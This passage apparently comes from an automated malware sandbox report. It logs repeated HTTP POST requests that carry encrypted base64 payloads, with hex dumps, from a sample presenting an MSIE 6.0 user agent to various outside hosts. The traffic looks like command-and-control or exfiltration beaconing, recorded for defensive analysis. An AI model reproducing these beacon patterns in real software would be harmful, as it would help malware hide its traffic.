44 55 70 6a 2f 48 51 66 4d 53 65 4d 54 64 34 75 57 6b 35 4d 51 72 34 78 61 53 31 32 79 33 30 74 65 42 43 35 45 47 6a 61 43 2f 69 39 64 2f 78 51 56 2b 74 75 66 6f 47 68 4b 54 35 35 59 4c 6b 73 55 6a 71 49 59 77 Data Ascii: Up1ycPR0BA80mnn7TxsWMkcMqUzs+IrhaBlbDZO/p6L83EVtnxvXeeaNdrrW6wffZIuJZ/gwW7Hiysz5Kq8jQ7vSqhqVxYAqCYEDdoxJfnZsbjAQkKazbtDxdD05JtNus1o2tZR/htldbdHhFUopjE3mSqLZnjqyNh70av2hcl5komlyKftvDuo95+g2WeuJxuUc0t5dBaiUKzr+rqazY/0ur6kiu677UAu6JvJjN9l3p4wVcyQh4FCzoVveAlWI0gUMdEkcNQR1BXGZ5t5vgpxOXg9t445m7FGZvD1YqX9XyskirnurfwZZVMwEoPVq94CVfWLvBK4o1ULZVw1YQpdRsP/Eqot8N2EB6zk6i4JhX06VRPEnAKB4ONrRui1PkS102Z3qEm+EEhTMD0y2u/UV4UtAaRwjXooVbHaSxzzWa75tQESFosmjHmoiXf0Nl+dbFAnkqeIDuVpd4eX2lrXEtzQKLkh+nE/gtm5ggQDUpj/HQfMSeMTd4uWk5MQr4xaS12y30teBC5EGjaC/i9d/xQV+tufoGhKT55YLksUjqIYw
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 30 58 2b 46 63 4a 42 31 42 41 39 2b 78 36 36 34 49 30 75 51 51 55 4f 48 41 58 4f 34 61 77 32 79 78 48 32 6b 30 36 69 2b 34 68 67 57 65 46 51 73 76 61 4c 49 62 65 53 53 31 4d 6c 4a 44 56 33 6d 53 57 66 54 4f 4c 6d 49 59 72 78 43 4d 6e 33 37 71 4e 64 75 56 76 37 4e 6f 52 33 4a 35 57 63 57 51 68 55 4a 63 76 48 72 77 31 56 62 58 72 67 6c 39 71 4c 56 56 45 77 77 36 4a 49 51 37 6e 75 54 74 36 74 33 6f 51 62 69 46 4e 48 47 72 4b 36 68 4a 53 5a 47 58 68 48 56 4d 56 53 38 6c 67 62 62 4a 42 75 57 53 6e 46 78 37 73 52 4f 44 46 57 70 79 47 72 50 7a 6f 6d 54 30 72 7a 6b 6e 39 61 52 42 63 79 46 52 36 6b 36 2b 5a 6d 57 74 54 6e 35 36 6d 70 67 36 5a 63 71 45 69 44 48 69 6d 64 73 52 70 65 69 67 44 62 2b 33 68 76 41 74 64 6e 51 79 50 54 72 38 35 6e 45 71 59 47 2f 56 4c 65 65 59 6b 68 51 37 2b 4b 78 70 4e 79 75 61 6d 66 31 6f 79 31 46 69 2b 47 73 33 5a 41 41 6a 6c 78 57 76 67 4f 74 56 39 74 6f 36 7a 57 47 6e 79 62 53 33 38 71 32 73 61 6f 44 74 76 56 2b 49 4a 30 62 6c 53 69 61 43 6f 2f 62 4b 50 6f 50 6e 76 4b 63 6a 31 73 39 31 47 53 6a 6e 4f 59 48 62 64 70 48 61 30 54 44 65 4b 30 7a 71 6b 66 4f 54 44 50 65 31 62 70 76 44 45 5a 63 59 45 76 34 71 68 2f 36 50 72 51 71 36 49 68 30 48 44 6c 66 30 4a 6d 36 70 68 75 47 63 71 4f 49 6a 75 57 5a 39 56 41 78 41 6b 76 6d 36 2b 4f 77 33 5a 72 31 44 73 4f 34 78 44 2b 6c 52 39 59 69 6f 51 57 47 6a 77 53 6e 6c 44 6b 34 43 2b 42 62 68 52 6d 53 52 30 67 7a 68 4d 74 47 2f 32 32 42 57 71 53 4b 64 77 6a 42 37 6e 7a 2f 4a 67 44 61 67 77 2f 6f 75 41 6b 6d 72 6a 2f 76 50 52 76 44 79 6e 73 67 6c 79 4e 2b 53 65 78 73 68 72 53 31 69 70 48 6d 77 45 39 37 4a 72 57 62 69 69 76 56 77 45 55 31 67 48 6c 31 2f 5a 42 36 42 75 33 2f 62 61 53 44 6d 69 50 47 71 46 53 65 Data Ascii: 0X+FcJB1BA9+x664I0uQQUOHAXO4aw2yxH2k06i+4hgWeFQsvaLIbeSS1MlJDV3mSWfTOLmIYrxCMn37qNduVv7NoR3J5WcWQhUJcvHrw1VbXrgl9qLVVEww6JIQ7nuTt6t3oQbiFNHGrK6hJSZGXhHVMVS8lgbbJBuWSnFx7sRODFWpyGrPzomT0rzkn9aRBcyFR6k6+ZmWtTn56mpg6ZcqEiDHimdsRpeigDb+3hvAtdnQyPTr85nEqYG/VLeeYkhQ7+KxpNyuamf1oy1Fi+Gs3ZAAjlxWvgOtV9to6zWGnybS38q2saoDtvV+IJ0blSiaCo/bKPoPnvKcj1s91GSjnOYHbdpHa0TDeK0zqkfOTDPe1bpvDEZcYEv4qh/6PrQq6Ih0HDlf0Jm6phuGcqOIjuWZ9VAxAkvm6+Ow3Zr1DsO4xD+lR9YioQWGjwSnlDk4C+BbhRmSR0gzhMtG/22BWqSKdwjB7nz/JgDagw/ouAkmrj/vPRvDynsglyN+SexshrS1ipHmwE97JrWbiivVwEU1gHl1/ZB6Bu3/baSDmiPGqFSe
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 55 70 31 79 63 50 52 30 42 41 38 30 6d 6e 6e 37 54 78 73 57 4d 6b 63 4d 71 55 7a 73 2b 49 72 68 61 42 6c 62 44 5a 4f 2f 70 36 4c 38 33 45 56 74 6e 78 76 58 65 65 61 4e 64 72 72 57 36 77 66 66 5a 49 75 4a 5a 2f 67 77 57 37 48 69 79 73 7a 35 4b 71 38 6a 51 37 76 53 71 68 71 56 78 59 41 71 43 59 45 44 64 6f 78 4a 66 6e 5a 73 62 6a 41 51 6b 4b 61 7a 62 74 44 78 64 44 30 35 4a 74 4e 75 73 31 6f 32 74 5a 52 2f 68 74 6c 64 62 64 48 68 46 55 6f 70 6a 45 33 6d 53 71 4c 5a 6e 6a 71 79 4e 68 37 30 61 76 32 68 63 6c 35 6b 6f 6d 6c 79 4b 66 74 76 44 75 6f 39 35 2b 67 32 57 65 75 4a 78 75 55 63 30 74 35 64 42 61 69 55 4b 7a 72 2b 72 71 61 7a 59 2f 30 75 72 36 6b 69 75 36 37 37 55 41 75 36 4a 76 4a 6a 4e 39 6c 33 70 34 77 56 63 79 51 68 34 46 43 7a 6f 56 76 65 41 6c 57 49 30 67 55 4d 64 45 6b 63 4e 51 52 31 42 58 47 5a 35 74 35 76 67 70 78 4f 58 67 39 74 34 34 35 6d 37 46 47 5a 76 44 31 59 71 58 39 58 79 73 6b 69 72 6e 75 72 66 77 5a 5a 56 4d 77 45 6f 50 56 71 39 34 43 56 66 57 4c 76 42 4b 34 6f 31 55 4c 5a 56 77 31 59 51 70 64 52 73 50 2f 45 71 6f 74 38 4e 32 45 42 36 7a 6b 36 69 34 4a 68 58 30 36 56 52 50 45 6e 41 4b 42 34 4f 4e 72 52 75 69 31 50 6b 53 31 30 32 5a 33 71 45 6d 2b 45 45 68 54 4d 44 30 79 32 75 2f 55 56 34 55 74 41 61 52 77 6a 58 6f 6f 56 62 48 61 53 78 7a 7a 57 61 37 35 74 51 45 53 46 6f 73 6d 6a 48 6d 6f 69 58 66 30 4e 6c 2b 64 62 46 41 6e 6b 71 65 49 44 75 56 70 64 34 65 58 32 6c 72 58 45 74 7a 51 4b 4c 6b 68 2b 6e 45 2f 67 74 6d 35 67 67 51 44 55 70 6a 2f 48 51 66 4d 53 65 4d 54 64 34 75 57 6b 35 4d 51 72 34 78 61 53 31 32 79 33 30 74 65 42 43 35 45 47 6a 61 43 2f 69 39 64 2f 78 51 56 2b 74 75 66 6f 47 68 4b 54 35 35 59 4c 6b 73 55 6a 71 49 59 77 Data Ascii: Up1ycPR0BA80mnn7TxsWMkcMqUzs+IrhaBlbDZO/p6L83EVtnxvXeeaNdrrW6wffZIuJZ/gwW7Hiysz5Kq8jQ7vSqhqVxYAqCYEDdoxJfnZsbjAQkKazbtDxdD05JtNus1o2tZR/htldbdHhFUopjE3mSqLZnjqyNh70av2hcl5komlyKftvDuo95+g2WeuJxuUc0t5dBaiUKzr+rqazY/0ur6kiu677UAu6JvJjN9l3p4wVcyQh4FCzoVveAlWI0gUMdEkcNQR1BXGZ5t5vgpxOXg9t445m7FGZvD1YqX9XyskirnurfwZZVMwEoPVq94CVfWLvBK4o1ULZVw1YQpdRsP/Eqot8N2EB6zk6i4JhX06VRPEnAKB4ONrRui1PkS102Z3qEm+EEhTMD0y2u/UV4UtAaRwjXooVbHaSxzzWa75tQESFosmjHmoiXf0Nl+dbFAnkqeIDuVpd4eX2lrXEtzQKLkh+nE/gtm5ggQDUpj/HQfMSeMTd4uWk5MQr4xaS12y30teBC5EGjaC/i9d/xQV+tufoGhKT55YLksUjqIYw
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fnsds.orgCache-Control: no-cacheData Raw: 55 58 49 43 72 35 66 63 39 51 37 50 5a 72 4d 73 68 6c 47 4f 66 2b 41 4f 37 56 54 4e 4b 4a 4e 42 75 79 47 6d 6b 4d 56 64 56 4d 33 67 53 67 53 48 2f 2f 49 48 52 77 72 38 6e 2f 2b 35 6b 67 6c 77 66 4f 63 4b 78 45 72 72 6a 66 67 79 45 55 61 6f 37 70 72 79 45 69 57 52 45 45 6b 62 49 51 6f 63 4a 57 6c 58 4f 7a 4f 34 51 75 4f 42 75 6c 38 41 55 2b 77 59 30 62 63 4c 68 50 47 44 65 52 55 5a 4b 2f 76 44 51 58 4b 76 76 43 6a 39 69 5a 6e 30 41 70 31 6d 76 6d 2b 33 77 79 71 30 68 38 48 37 51 59 75 39 50 68 49 52 56 76 47 72 64 73 47 65 72 7a 6d 72 31 5a 74 4b 41 58 66 32 69 52 35 4b 4b 37 68 71 46 66 4d 79 62 7a 75 47 6a 64 42 38 30 72 5a 74 53 77 6f 6f 6b 50 36 58 36 43 61 4f 61 53 2b 6f 70 47 6f 6f 66 66 4b 65 4a 48 4f 75 46 78 50 42 43 4f 41 48 39 2f 63 31 41 6b 48 44 66 65 32 68 48 48 50 59 41 6a 56 2b 39 56 6f 55 6f 51 2f 31 70 6d 4e 51 31 59 36 66 46 67 31 79 45 6b 7a 67 63 4a 54 6e 39 78 2b 56 47 49 30 4e 70 7a 6b 5a 59 38 6d 2f 56 43 31 4e 50 64 59 33 73 79 57 41 49 6f 43 43 39 2f 31 32 4b 78 4c 36 64 69 53 6f 44 2f 59 59 6e 54 63 6d 79 55 32 68 38 6b 68 6a 6c 59 70 67 2b 4f 4a 74 37 66 49 70 79 46 6c 38 55 2b 49 53 2f 7a 70 6b 42 76 62 47 2f 5a 50 4d 2f 38 78 52 69 44 6e 59 37 68 63 4d 43 61 69 37 68 78 44 68 44 2b 69 50 71 58 77 33 69 71 56 72 4e 75 36 67 52 77 31 47 66 70 35 42 6d 6b 37 2f 65 73 32 68 35 4a 59 64 4a 6c 4a 43 70 39 5a 4a 75 70 69 4d 6e 5a 61 7a 75 68 6d 44 78 4a 58 65 70 6b 33 2f 2f 42 6e 48 63 2f 75 50 33 46 32 77 7a 64 69 6b 75 42 46 43 36 32 61 4f 44 7a 53 4c 74 30 41 4f 65 6d 76 54 71 78 35 52 70 43 68 66 35 71 4e 57 6a 38 47 4d 70 78 53 2f 53 52 32 64 47 34 4b 58 42 58 72 4e 4a 7a 4d 75 77 6c 47 4f 54 31 49 43 44 43 2b 6b 4d 4d 46 54 78 64 44 36 61 4b 6f 33 4f 63 41 3d Data Ascii: UXICr5fc9Q7PZrMshlGOf+AO7VTNKJNBuyGmkMVdVM3gSgSH//IHRwr8n/+5kglwfOcKxErrjfgyEUao7pryEiWREEkbIQocJWlXOzO4QuOBul8AU+wY0bcLhPGDeRUZK/vDQXKvvCj9iZn0Ap1mvm+3wyq0h8H7QYu9PhIRVvGrdsGerzmr1ZtKAXf2iR5KK7hqFfMybzuGjdB80rZtSwookP6X6CaOaS+opGooffKeJHOuFxPBCOAH9/c1AkHDfe2hHHPYAjV+9VoUoQ/1pmNQ1Y6fFg1yEkzgcJTn9x+VGI0NpzkZY8m/VC1NPdY3syWAIoCC9/12KxL6diSoD/YYnTcmyU2h8khjlYpg+OJt7fIpyFl8U+IS/zpkBvbG/ZPM/8xRiDnY7hcMCai7hxDhD+iPqXw3iqVrNu6gRw1Gfp5Bmk7/es2h5JYdJlJCp9ZJupiMnZazuhmDxJXepk3//BnHc/uP3F2wzdikuBFC62aODzSLt0AOemvTqx5RpChf5qNWj8GMpxS/SR2dG4KXBXrNJzMuwlGOT1ICDC+kMMFTxdD6aKo3OcA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 53 70 46 39 5a 51 75 72 4c 51 39 6d 52 6e 67 4f 59 67 54 36 35 33 51 46 56 68 31 52 6d 6a 4b 37 62 34 56 68 74 41 61 70 5a 75 54 62 36 4e 69 63 52 77 76 79 50 51 44 50 38 51 49 6d 52 51 54 78 61 55 36 6b 4f 39 43 31 33 70 57 79 51 53 43 77 6e 65 77 44 45 39 6d 33 32 70 43 6f 6e 4b 5a 33 78 6b 4e 4c 48 76 6d 65 55 75 68 31 7a 37 2b 79 41 58 76 49 41 37 76 5a 58 65 53 34 56 46 78 4b 79 33 4d 62 45 73 48 49 73 49 2f 36 37 68 6f 2f 73 48 76 44 73 4b 48 67 42 4b 57 42 34 6e 63 58 76 57 53 30 35 48 64 4c 36 38 43 63 41 56 49 72 4e 4b 78 75 63 6f 35 47 36 54 46 47 6e 42 46 5a 6e 77 59 58 6d 4b 68 70 54 45 66 4d 53 75 4f 34 48 6f 6b 5a 34 57 55 51 77 47 2f 41 30 74 57 63 63 78 6a 6f 31 32 37 51 45 56 46 68 52 6c 69 39 55 76 30 4c 59 5a 72 74 4b 59 31 50 6d 66 66 49 6b 4b 75 51 47 61 5a 6f 55 59 55 6f 6a 78 2f 6f 43 4e 6d 58 36 37 57 69 32 42 42 75 38 76 30 61 6f 52 71 6d 54 38 52 77 51 6d 43 78 75 50 35 61 77 35 4f 59 43 2f 37 70 57 64 4b 74 58 48 73 65 66 6e 72 72 61 54 32 6a 49 6d 50 65 6d 32 78 4a 32 4b 72 4e 54 52 55 38 77 70 76 38 47 69 39 58 44 2b 74 43 77 2f 38 54 43 57 66 6a 61 39 65 6a 44 47 4e 69 37 45 46 56 65 37 67 78 35 5a 76 45 4c 54 62 79 54 33 39 46 6b 6c 4b 6e 47 73 77 6b 73 32 6f 42 5a 77 64 2f 6d 53 6e 66 61 5a 4a 4d 53 38 7a 64 74 62 74 4d 6d 41 76 68 4f 55 55 38 66 68 44 43 32 63 4e 48 66 6d 79 4e 79 53 36 37 53 48 49 57 42 32 45 73 35 57 34 73 74 53 76 5a 50 69 35 62 39 62 2b 35 67 41 74 35 54 43 57 63 6f 30 4b 64 31 37 56 43 36 59 6a 75 56 6c 64 74 4f 68 37 5a 63 6c 2f 2b 4b 72 5a 6b 6b 59 37 66 4c 50 57 79 47 30 6d 73 62 77 3d 3d Data Ascii: SpF9ZQurLQ9mRngOYgT653QFVh1RmjK7b4VhtAapZuTb6NicRwvyPQDP8QImRQTxaU6kO9C13pWyQSCwnewDE9m32pConKZ3xkNLHvmeUuh1z7+yAXvIA7vZXeS4VFxKy3MbEsHIsI/67ho/sHvDsKHgBKWB4ncXvWS05HdL68CcAVIrNKxuco5G6TFGnBFZnwYXmKhpTEfMSuO4HokZ4WUQwG/A0tWccxjo127QEVFhRli9Uv0LYZrtKY1PmffIkKuQGaZoUYUojx/oCNmX67Wi2BBu8v0aoRqmT8RwQmCxuP5aw5OYC/7pWdKtXHsefnrraT2jImPem2xJ2KrNTRU8wpv8Gi9XD+tCw/8TCWfja9ejDGNi7EFVe7gx5ZvELTbyT39FklKnGswks2oBZwd/mSnfaZJMS8zdtbtMmAvhOUU8fhDC2cNHfmyNyS67SHIWB2Es5W4stSvZPi5b9b+5gAt5TCWco0Kd17VC6YjuVldtOh7Zcl/+KrZkkY7fLPWyG0msbw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pohlfood.comCache-Control: no-cacheData Raw: 6a 70 76 58 59 35 62 74 4e 51 2f 67 50 50 34 41 63 63 64 37 73 6a 6e 72 47 79 59 32 63 7a 34 52 4b 70 76 4e 67 34 74 2f 46 6c 41 52 41 6a 66 78 4a 39 43 79 38 65 76 36 51 58 44 53 62 6d 62 37 2f 35 54 37 66 33 64 30 41 47 69 6b 50 31 47 59 42 49 76 6e 50 55 4e 42 32 7a 6d 6c 57 32 71 4b 41 64 4a 36 72 42 6d 33 32 31 30 6e 55 71 49 56 79 66 32 4e 4b 35 51 41 54 34 67 4f 57 6a 55 75 58 36 6e 64 4e 75 66 59 46 43 2f 4c 64 6e 55 52 61 33 6b 4a 50 38 70 5a 51 32 45 53 51 2f 66 72 57 4b 52 4e 47 59 6b 36 49 31 4d 65 61 4f 4c 54 43 39 44 2f 55 41 7a 68 5a 50 31 56 47 68 7a 61 35 78 30 2f 6a 44 6f 54 6f 70 44 78 52 2b 69 4e 72 39 4b 65 46 48 77 39 39 50 38 41 68 30 74 56 78 46 33 62 4c 33 38 64 6b 4b 61 55 51 5a 2b 6a 4c 73 57 63 64 75 4e 6f 70 79 79 63 5a 4a 43 46 4d 6b 56 2b 34 61 49 76 4d 4e 6b 77 41 39 58 69 70 57 37 6f 46 58 51 46 42 57 71 53 4e 4e 72 4a 33 46 64 76 4e 31 53 49 4c 58 50 66 4d 47 57 5a 78 54 30 51 55 67 31 6c 70 4b 32 41 6e 50 4e 64 66 6d 53 72 6b 46 66 73 36 49 42 52 6a 65 70 37 70 67 4d 64 4b 4f 31 38 42 51 6f 2f 4f 4e 39 53 65 4b 58 4e 43 56 77 53 53 68 4b 55 6a 58 36 6f 2b 36 30 56 38 2b 4c 75 77 38 32 67 6c 34 5a 33 62 6c 77 66 49 62 4a 56 31 4e 6f 45 33 75 5a 72 68 34 70 48 4f 70 31 77 37 6b 44 67 4e 4a 78 79 52 47 63 35 33 35 63 55 37 65 54 4e 36 2f 4c 36 6b 78 4c 6e 30 74 4e 56 51 75 49 65 39 31 68 6b 6a 38 5a 4b 6b 72 41 50 4a 68 47 52 6c 44 6b 76 6e 74 67 30 6d 51 45 52 2f 55 77 67 55 6f 6e 33 38 2b 69 76 57 67 33 77 58 5a 34 63 61 2b 35 37 43 61 73 36 64 55 6e 58 34 37 47 67 71 73 44 32 42 30 30 68 46 4e 35 74 41 63 31 39 32 2b 6e 7a 48 46 75 43 46 77 63 37 37 53 61 65 66 63 69 4d 54 69 45 4b 45 56 30 67 32 4a 5a 4c 66 5a 61 6f 55 58 6c 74 63 71 4f 4e 2b 61 71 2b 55 65 31 4f 49 54 50 61 6b 6f 4a 59 76 77 3d 3d Data Ascii: jpvXY5btNQ/gPP4Accd7sjnrGyY2cz4RKpvNg4t/FlARAjfxJ9Cy8ev6QXDSbmb7/5T7f3d0AGikP1GYBIvnPUNB2zmlW2qKAdJ6rBm3210nUqIVyf2NK5QAT4gOWjUuX6ndNufYFC/LdnURa3kJP8pZQ2ESQ/frWKRNGYk6I1MeaOLTC9D/UAzhZP1VGhza5x0/jDoTopDxR+iNr9KeFHw99P8Ah0tVxF3bL38dkKaUQZ+jLsWcduNopyycZJCFMkV+4aIvMNkwA9XipW7oFXQFBWqSNNrJ3FdvN1SILXPfMGWZxT0QUg1lpK2AnPNdfmSrkFfs6IBRjep7pgMdKO18BQo/ON9SeKXNCVwSShKUjX6o+60V8+Luw82gl4Z3blwfIbJV1NoE3uZrh4pHOp1w7kDgNJxyRGc535cU7eTN6/L6kxLn0tNVQuIe91hkj8ZKkrAPJhGRlDkvntg0mQER/UwgUon38+ivWg3wXZ4ca+57Cas6dUnX47GgqsD2B00hFN5tAc192+nzHFuCFwc77SaefciMTiEKEV0g2JZLfZaoUXltcqON+aq+Ue1OITPakoJYvw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 53 70 46 39 5a 51 75 72 4c 51 39 6d 52 6e 67 4f 59 67 54 36 35 33 51 46 56 68 31 52 6d 6a 4b 37 62 34 56 68 74 41 61 70 5a 75 54 62 36 4e 69 63 52 77 76 79 50 51 44 50 38 51 49 6d 52 51 54 78 61 55 36 6b 4f 39 43 31 33 70 57 79 51 53 43 77 6e 65 77 44 45 39 6d 33 32 70 43 6f 6e 4b 5a 33 78 6b 4e 4c 48 76 6d 65 55 75 68 31 7a 37 2b 79 41 58 76 49 41 37 76 5a 58 65 53 34 56 46 78 4b 79 33 4d 62 45 73 48 49 73 49 2f 36 37 68 6f 2f 73 48 76 44 73 4b 48 67 42 4b 57 42 34 6e 63 58 76 57 53 30 35 48 64 4c 36 38 43 63 41 56 49 72 4e 4b 78 75 63 6f 35 47 36 54 46 47 6e 42 46 5a 6e 77 59 58 6d 4b 68 70 54 45 66 4d 53 75 4f 34 48 6f 6b 5a 34 57 55 51 77 47 2f 41 30 74 57 63 63 78 6a 6f 31 32 37 51 45 56 46 68 52 6c 69 39 55 76 30 4c 59 5a 72 74 4b 59 31 50 6d 66 66 49 6b 4b 75 51 47 61 5a 6f 55 59 55 6f 6a 78 2f 6f 43 4e 6d 58 36 37 57 69 32 42 42 75 38 76 30 61 6f 52 71 6d 54 38 52 77 51 6d 43 78 75 50 35 61 77 35 4f 59 43 2f 37 70 57 64 4b 74 58 48 73 65 66 6e 72 72 61 54 32 6a 49 6d 50 65 6d 32 78 4a 32 4b 72 4e 54 52 55 38 77 70 76 38 47 69 39 58 44 2b 74 43 77 2f 38 54 43 57 66 6a 61 39 65 6a 44 47 4e 69 37 45 46 56 65 37 67 78 35 5a 76 45 4c 54 62 79 54 33 39 46 6b 6c 4b 6e 47 73 77 6b 73 32 6f 42 5a 77 64 2f 6d 53 6e 66 61 5a 4a 4d 53 38 7a 64 74 62 74 4d 6d 41 76 68 4f 55 55 38 66 68 44 43 32 63 4e 48 66 6d 79 4e 79 53 36 37 53 48 49 57 42 32 45 73 35 57 34 73 74 53 76 5a 50 69 35 62 39 62 2b 35 67 41 74 35 54 43 57 63 6f 30 4b 64 31 37 56 43 36 59 6a 75 56 6c 64 74 4f 68 37 5a 63 6c 2f 2b 4b 72 5a 6b 6b 59 37 66 4c 50 57 79 47 30 6d 73 62 77 3d 3d Data Ascii: SpF9ZQurLQ9mRngOYgT653QFVh1RmjK7b4VhtAapZuTb6NicRwvyPQDP8QImRQTxaU6kO9C13pWyQSCwnewDE9m32pConKZ3xkNLHvmeUuh1z7+yAXvIA7vZXeS4VFxKy3MbEsHIsI/67ho/sHvDsKHgBKWB4ncXvWS05HdL68CcAVIrNKxuco5G6TFGnBFZnwYXmKhpTEfMSuO4HokZ4WUQwG/A0tWccxjo127QEVFhRli9Uv0LYZrtKY1PmffIkKuQGaZoUYUojx/oCNmX67Wi2BBu8v0aoRqmT8RwQmCxuP5aw5OYC/7pWdKtXHsefnrraT2jImPem2xJ2KrNTRU8wpv8Gi9XD+tCw/8TCWfja9ejDGNi7EFVe7gx5ZvELTbyT39FklKnGswks2oBZwd/mSnfaZJMS8zdtbtMmAvhOUU8fhDC2cNHfmyNyS67SHIWB2Es5W4stSvZPi5b9b+5gAt5TCWco0Kd17VC6YjuVldtOh7Zcl/+KrZkkY7fLPWyG0msbw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 53 36 41 76 78 70 6f 41 61 77 2f 2f 30 6f 65 4e 76 56 63 6c 74 74 33 6b 32 75 43 4b 50 41 52 72 62 67 54 70 70 6e 39 78 30 59 74 65 78 4a 2f 79 35 53 63 53 34 2f 2b 2b 49 46 59 76 42 78 33 55 4c 39 41 4a 62 35 5a 43 64 31 59 64 68 70 6f 45 39 68 39 78 44 43 63 78 6a 6a 34 68 47 45 37 6b 31 49 55 39 64 51 54 56 57 36 32 61 4a 30 51 6f 49 52 61 36 4a 51 57 6e 78 79 4f 50 73 6d 76 4f 54 43 77 2f 49 52 46 32 79 31 71 6a 62 43 39 2f 43 6d 61 41 4f 74 31 77 61 42 50 66 39 53 54 4b 39 49 55 4e 64 74 2f 66 66 5a 6e 59 5a 71 63 73 65 56 55 41 61 57 4a 71 37 49 4e 73 6d 4f 53 66 77 48 32 54 6f 79 6e 6d 6a 41 7a 4c 36 31 58 4f 4a 46 65 4a 53 52 70 2f 48 77 30 39 41 6b 6c 59 42 62 59 67 4d 56 69 72 73 58 41 4f 66 50 6c 2f 34 37 72 47 4b 53 68 4a 79 38 62 68 33 48 59 34 39 49 4c 50 45 59 7a 6f 46 62 44 44 56 63 55 4f 36 59 67 73 5a 58 2f 32 4c 51 63 67 2b 2f 6a 5a 39 30 46 38 51 2f 59 2b 4b 5a 37 37 4a 42 5a 56 68 53 76 76 63 30 43 72 31 64 38 39 6c 53 37 47 36 7a 48 2b 41 6f 66 37 43 45 72 79 2f 64 4f 31 78 35 7a 48 4a 64 50 78 47 42 58 4d 42 47 75 44 73 47 53 52 73 2b 42 51 2f 58 74 58 41 64 61 31 68 50 74 6b 52 47 57 59 45 4c 36 37 72 62 49 6a 33 79 6f 66 31 4b 49 45 54 54 56 67 39 35 55 4a 54 31 4e 74 44 62 47 74 6b 54 48 63 58 42 48 43 38 77 46 76 59 37 6e 62 46 77 57 4f 30 6a 48 43 4e 58 38 6e 53 7a 57 73 70 46 4c 57 46 51 50 31 68 61 56 74 51 45 63 39 58 33 5a 42 6d 73 53 37 69 43 4e 49 6a 4d 42 4a 4e 79 43 4e 50 33 42 55 58 38 71 41 50 74 6f 38 64 77 66 4a 30 31 37 53 63 2b 52 43 39 77 68 64 49 37 62 77 62 4e 4f 43 65 57 45 33 62 45 2f 63 6a 6d 6c 50 43 35 51 4a 52 72 4c 70 6a 76 41 65 38 31 32 62 73 55 54 6f 6d 67 62 75 32 6c 52 45 59 2b 49 39 68 32 34 3d Data Ascii: S6AvxpoAaw//0oeNvVcltt3k2uCKPARrbgTppn9x0YtexJ/y5ScS4/++IFYvBx3UL9AJb5ZCd1YdhpoE9h9xDCcxjj4hGE7k1IU9dQTVW62aJ0QoIRa6JQWnxyOPsmvOTCw/IRF2y1qjbC9/CmaAOt1waBPf9STK9IUNdt/ffZnYZqcseVUAaWJq7INsmOSfwH2ToynmjAzL61XOJFeJSRp/Hw09AklYBbYgMVirsXAOfPl/47rGKShJy8bh3HY49ILPEYzoFbDDVcUO6YgsZX/2LQcg+/jZ90F8Q/Y+KZ77JBZVhSvvc0Cr1d89lS7G6zH+Aof7CEry/dO1x5zHJdPxGBXMBGuDsGSRs+BQ/XtXAda1hPtkRGWYEL67rbIj3yof1KIETTVg95UJT1NtDbGtkTHcXBHC8wFvY7nbFwWO0jHCNX8nSzWspFLWFQP1haVtQEc9X3ZBmsS7iCNIjMBJNyCNP3BUX8qAPto8dwfJ017Sc+RC9whdI7bwbNOCeWE3bE/cjmlPC5QJRrLpjvAe812bsUTomgbu2lREY+I9h24=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWk1MSXhnY2ZZR09Fb1E4UUxTcm9qUUFBQUVBIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaTUxJeGdjZllHT0VvUThRTFNyb2pRQUFBRUEiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU3MiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUND